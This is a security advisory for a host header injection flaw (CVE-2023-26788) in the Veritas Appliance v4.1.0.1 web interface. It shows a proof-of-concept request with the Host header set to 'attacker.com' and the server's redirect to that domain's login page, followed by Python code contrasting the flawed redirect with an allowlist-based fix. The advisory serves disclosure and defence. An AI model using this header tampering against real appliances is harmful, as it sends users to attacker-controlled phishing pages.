Host Header Injection (HHI) Attack - CVE-2023-26788
---------------------------------------------------
Version: Veritas Appliance v4.1.0.1
Type: Unauthenticated Remote attack
We have identified that the "Veritas Appliance v4.1.0.1" web interface is affected by Host Header Injection attacks. The HTTP Host header can be manipulated, causing the application to behave in unexpected ways: any change made to the header causes the request to be sent to a completely different domain/IP address. This is because the server implicitly trusts the Host header and fails to validate or escape it properly.
An attacker would be able to tamper with the Host header value during HTTP request interception (MiTM attack); the attacker's domain is then added to the web page code used for redirection, forcing the victim's web browser to redirect to the attacker's domain/malicious web page. This opens the way to further attacks and malicious actions.
Evidence is provided below.
Request:
GET / HTTP/1.1
Host: attacker.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Length: 0
Origin: https://172.16.4.100
Connection: close
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

Response:
HTTP/1.0 302 Redirect
Server: GoAhead-Webs
Date: Thu Jun 7 11:45:03 2018
Cache-Control: no-cache, no-store, must-revalidate,private
Pragma: no-cache
Expires: 0
Content-Type: text/html
X-Frame-Options: sameorigin
X-XSS-Protection: 1; mode=block
X-Content-Type-Options: nosniff
Location: https://attacker.com/login.asp

<html><head></head><body>
This document has moved to a new <a href="https://attacker.com/login.asp">location</a>.
Please update your documents to reflect the new location.
</body></html>
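
A server-side mitigation for the behaviour in the evidence above, as an added example that is not Veritas or GoAhead code: the first function builds the redirect from the client's Host value as the response shows, the second only uses hosts from an allowlist. `ALLOWED_HOSTS`, `CANONICAL_HOST`, the function names and the `appliance.example.test` name are assumptions, and the request is a constructed sample reduced from the one above.

```python
from urllib.parse import urlsplit

# Assumptions: the names the web interface is legitimately reached under,
# and the one used whenever the client-supplied Host is not trusted.
ALLOWED_HOSTS = {"172.16.4.100", "appliance.example.test"}
CANONICAL_HOST = "172.16.4.100"

# Constructed sample, reduced from the request shown in the evidence.
SAMPLE_REQUEST = (
    "GET / HTTP/1.1\r\n"
    "Host: attacker.com\r\n"
    "Connection: close\r\n\r\n"
)

def host_header(raw_request):
    """Return the Host header value, or None if absent or sent more than once."""
    head = raw_request.split("\r\n\r\n", 1)[0]
    values = []
    for line in head.split("\r\n")[1:]:          # skip the request line
        name, sep, value = line.partition(":")
        if sep and name.strip().lower() == "host":
            values.append(value.strip())
    return values[0] if len(values) == 1 else None

def redirect_reflecting_host(raw_request):
    """Behaviour seen in the evidence: Location is built from the client's Host."""
    return "https://%s/login.asp" % host_header(raw_request)

def redirect_validated(raw_request):
    """Hardened form: Location only ever contains an allowlisted host name."""
    host = host_header(raw_request)
    name = None
    if host:
        try:
            # Parse as an authority so ports and userinfo tricks are stripped.
            name = urlsplit("//" + host).hostname
        except ValueError:
            name = None
    if name not in ALLOWED_HOSTS:
        name = CANONICAL_HOST                    # never echo untrusted input
    # The port is dropped on purpose (assumes HTTPS on the default port).
    return "https://%s/login.asp" % name

if __name__ == "__main__":
    print("reflecting:", redirect_reflecting_host(SAMPLE_REQUEST))
    print("validated: ", redirect_validated(SAMPLE_REQUEST))
```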